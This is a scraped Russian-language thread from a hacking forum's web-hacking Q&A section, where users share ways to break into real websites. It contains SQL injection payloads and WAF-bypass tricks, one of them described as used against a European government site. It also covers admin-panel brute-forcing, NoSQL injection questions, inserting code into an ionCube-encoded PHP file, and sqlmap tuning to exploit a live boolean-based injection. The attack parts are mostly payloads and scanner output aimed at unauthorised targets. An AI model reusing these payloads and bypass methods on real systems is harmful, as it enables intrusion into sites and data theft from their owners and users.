Кстати, вот всегда было интересно, как определить на что именно триггерется ваф?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Можешь взять список всех сайтов нужной доменной зоны и написать whois чекер, который распарсит тебе данные по времени регистрации домена.
Так же можешь распарсить любые другие данные, типа алексы.
Я например делаю так, есть такой запрос в параметре id=1 на который сервер отвечает кодом 403:
Код:
' UNION ALL SELECT NULL,VERSION(),NULL,NULL --Поочередно начинаешь формировать его таким образом:
id=1' (подставил кавычку и смотришь отдает 403 или нет, если нет то идешь дальше)
id=1' UNION (тоже самое, если не отдает 403 то идешь дальше)
id=1' UNION ALL (тоже самое, если не отдает 403 то идешь дальше)
А когда находишь слово(а) или символ который фильтруются то составляешь запрос с байпасом, например видишь что стриггерилось на UNION, то делаешь например такой запрос с комментом:
Код:
id=1' /*!55431%55NiOn*/И идешь дальше, если триггера нет. Если же триггерится на такое, то подбираешь другой пэйлоад. Ну может кто-то по другому ищет, я руками дотошно сижу кручу-верчу.
Кста, пару лет назад на крупном eu gov сайте ни как не мог понять в чем дело и не мог обойти ваф, дня 3 сидел возился с ним, оказалось что в параметре фильтруются именно первые 50 символов, и оно обходилось так (добавлением коммента с пятидесятью цифрами в самом начале запроса): id=1'%20/*11111111111111111111111111111111111111111111111111111*/%20union%20all%20select%20null и так далее. Экспериментировать кароч надо.
Есть dom xss с возможностью передать данные по ссылке, что с ней можно сделать дальше?
Одно из лучший обьяснений, спасибо!!!
Если в БД есть таблицы с назаниями wp_users, wp_config и тому подобные, можно сделать вывод что сайт работает на WordPress?
Перепробовал кучу поисковиков админок но никак не могу найти страницу входа в админку, какие направления можно еще посмотреть чтобы найти ее?
Перепробовал кучу поисковиков админок но никак не могу найти страницу входа в админку, какие направления можно еще посмотреть чтобы найти ее?
Все стандартные названия перепробовал, может есть какой то сильный инструмент для брута?
проверь wappalyzer на чем сайт,потом можешь на robots.txt посмотреть,Для брута wfuzz,ffuf,feroxbuster,dirbuster,словари можно взять с https://wordlists.assetnote.io/
https://xss.pro/threads/65017
Тут все расписано
Привет.
Есть одна nosql база, данные из которой можно достать из метода ajax.get.php?collection=(тут коллекция, по скану эндпоинтов нашел выгрузку акций магазина))
Параметр и вообще метод уязвим, т.к. при подстановке collection[$where] выдает ошибку, мол при обработке запроса возникла ошибка. подробные ответы ошибок настраиваютяся в ./setting.php
Сама проблема, мне нужно хотя бы достать наименования коллекций. но там висит af, который блокирует основные пейлоады.
Каким образом можно забайпасить аф? Множественный url encode не помогает.
Также интересует, какой пейлоад нужен для отображения всех коллекций?
Есть одна nosql база, данные из которой можно достать из метода ajax.get.php?collection=(тут коллекция, по скану эндпоинтов нашел выгрузку акций магазина))
Параметр и вообще метод уязвим, т.к. при подстановке collection[$where] выдает ошибку, мол при обработке запроса возникла ошибка. подробные ответы ошибок настраиваютяся в ./setting.php
Сама проблема, мне нужно хотя бы достать наименования коллекций. но там висит af, который блокирует основные пейлоады.
Каким образом можно забайпасить аф? Множественный url encode не помогает.
Также интересует, какой пейлоад нужен для отображения всех коллекций?
Где посмотреть известные уязвимости тем и плагинов на вордпресс
Подскажите как можно заиклудить скрипт в файл php зашифрованный ioncube
Выдает File correpted
Код:
<?php if(isset($_GET['qweasd'])) { die("qweasd");}?>
<?php //004fb
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));Выдает File correpted
Видишь скулю?
Нет
А она есть....
-------------------------------------------------------------------------------------------
URL encoded GET input id was set to -1' OR 321=6 AND 000739=000739 --
Tests performed:
-1' OR 2+739-739-1=0+0+0+1 -- => TRUE
-1' OR 3+739-739-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+739-739) -- => FALSE
-1' OR 3*2>(0+5+739-739) -- => FALSE
-1' OR 2+1-1+1=1 AND 000739=000739 -- => FALSE
-1' OR 3*2=5 AND 000739=000739 -- => FALSE
-1' OR 3*2=6 AND 000739=000739 -- => TRUE
-1' OR 3*2*0=6 AND 000739=000739 -- => FALSE
-1' OR 3*2*1=6 AND 000739=000739 -- => TRUE
Original value: NormalValue
Proof of Exploit
SQL query - SELECT database()
dbname (точно точно там дб нэйм , такое не придумаешь)
-----------------------------------------------------------------------------------------------------------------
Мапа не раскручивает... окунь как понимаю не юзая никакие тамперы, хексы, ноу-касты, и прочее - но до дб добрался легко.
Наблюдал долго через v5 за всем этим делом --
1 . пэйлоада подобного не увидел. никогда значение NormalValue параметра id не было изменено на -1, как в пэйлоаде .
После знаков -- в пэйлоаде мапа норовит что-то дописать. В успешном варианте , пробившемся - пустота
Пробовал всё почти. -r -u -tampers -hex -no-cast -random-agent and etc etc. But no result.
Вопрос 1
Могу вручную в запросе выставить подходящее значение -1 , но будет ли это нормально?- без оригинального значения и тд. Мапа пишем сама мол не балуйся, ставь ориджинал.
Вопрос 2 - как с помощью sufix , prefix, или стринг string - использовать именно этот/эти пэйлоады - трушные так сказать. (они ж True) . А не лить по 8к реквестов . С одного бы залететь.
Путь к уязе очень прост. www.site.com/?id=NormalValue. Помогите раскрутить плз)
Вопрос 3 как прописать эти пэйлоады кастомно . по типу --- https://github.com/sqlmapproject/sqlmap/issues/4091 (другая история) . Не очень шарю в этом пэйлоадобилдерстве. Скрипткидди ибо ( но понять хочу!
Всем хорошего дня.
Нет
А она есть....
-------------------------------------------------------------------------------------------
URL encoded GET input id was set to -1' OR 321=6 AND 000739=000739 --
Tests performed:
-1' OR 2+739-739-1=0+0+0+1 -- => TRUE
-1' OR 3+739-739-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+739-739) -- => FALSE
-1' OR 3*2>(0+5+739-739) -- => FALSE
-1' OR 2+1-1+1=1 AND 000739=000739 -- => FALSE
-1' OR 3*2=5 AND 000739=000739 -- => FALSE
-1' OR 3*2=6 AND 000739=000739 -- => TRUE
-1' OR 3*2*0=6 AND 000739=000739 -- => FALSE
-1' OR 3*2*1=6 AND 000739=000739 -- => TRUE
Original value: NormalValue
Proof of Exploit
SQL query - SELECT database()
dbname (точно точно там дб нэйм , такое не придумаешь)
-----------------------------------------------------------------------------------------------------------------
Мапа не раскручивает... окунь как понимаю не юзая никакие тамперы, хексы, ноу-касты, и прочее - но до дб добрался легко.
Наблюдал долго через v5 за всем этим делом --
1 . пэйлоада подобного не увидел. никогда значение NormalValue параметра id не было изменено на -1, как в пэйлоаде .
После знаков -- в пэйлоаде мапа норовит что-то дописать. В успешном варианте , пробившемся - пустота
Пробовал всё почти. -r -u -tampers -hex -no-cast -random-agent and etc etc. But no result.
Вопрос 1
Могу вручную в запросе выставить подходящее значение -1 , но будет ли это нормально?- без оригинального значения и тд. Мапа пишем сама мол не балуйся, ставь ориджинал.
Вопрос 2 - как с помощью sufix , prefix, или стринг string - использовать именно этот/эти пэйлоады - трушные так сказать. (они ж True) . А не лить по 8к реквестов . С одного бы залететь.
Путь к уязе очень прост. www.site.com/?id=NormalValue. Помогите раскрутить плз)
Вопрос 3 как прописать эти пэйлоады кастомно . по типу --- https://github.com/sqlmapproject/sqlmap/issues/4091 (другая история) . Не очень шарю в этом пэйлоадобилдерстве. Скрипткидди ибо ( но понять хочу!
Всем хорошего дня.
Тут все что угодно может быть, причин масса, почему мап не детектит. Можешь залить сайт под хайд, я чекну - в таком случае не забудь Request/Response от окуня приложить. В личку только прошу не ломиться, там не отвечаю.
Попробуй через --string прописать строку для определения TRUE или чере --not-string для FALSE. Иногда sqlmap не находит различий между ними, если ему явно не указать
пробовал , и --test-filter под OR AND врубал
Исходя из тестов - это boolean based . включаем technique=B Сокращаемс реквесты, ваф рубит + куки нужно собрать , чтобы показали настоящий сайт , а не редирект. Не суть. Полезно же уметь делать пару точных тестов, вместо кучи.
string прописывал прям так. Не в url encode. Есть сомнение.
Насчет string - точно ли пэйлоад нужно там указывать, а не различия в страницах мол. Ибо мапа находит уязвимый параметр иногда с string="какая нибудь херь сайта, порой в иероглифах*
стэмпарм советовал иногда в таких случаях включать --invalid-logical, но мы выше видим в тестах что значения равны. а не 12321=55346 например...
Еще разок. товарищи, суфикс префикс как под это прописать? Хочу научиться . Все же работают с сканерами почти, они указывают вектор атаки - меньше запросов, быстрее. (хотя иногда мапа сама находит допом вектором атак, но это сколько реквестов на lvl5 risk3 ухх)
Последнее редактирование:
Скрытый контент для пользователей: c0d3x.